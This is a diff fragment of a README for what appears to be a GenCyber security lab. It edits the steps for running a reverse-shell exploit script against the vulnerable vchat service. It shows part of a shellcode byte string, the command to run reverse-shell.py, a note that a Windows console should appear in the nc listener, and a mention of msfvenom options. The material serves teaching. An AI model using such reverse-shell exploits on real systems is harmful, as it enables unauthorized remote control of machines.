xinwenfu/GenCyber/SoftwareSecurity/README.md

 SHELL += b"\xcc\xaf\xd5"
 ```

-3. Save reverse-shell.py and run the following command in the folder of /home/kali/GenCyber/vchat/Attack/ within a terminal
+3. Save reverse-shell.py and run the following command in the folder of /home/kali/GenCyber/vchat/Attack/ within another terminal
 ```
 python reverse-shell.py
 ```
+If everything is right, you shall see the Windows console in the terminal running the *nc* command.

 Notes:

 *msfvenom* command options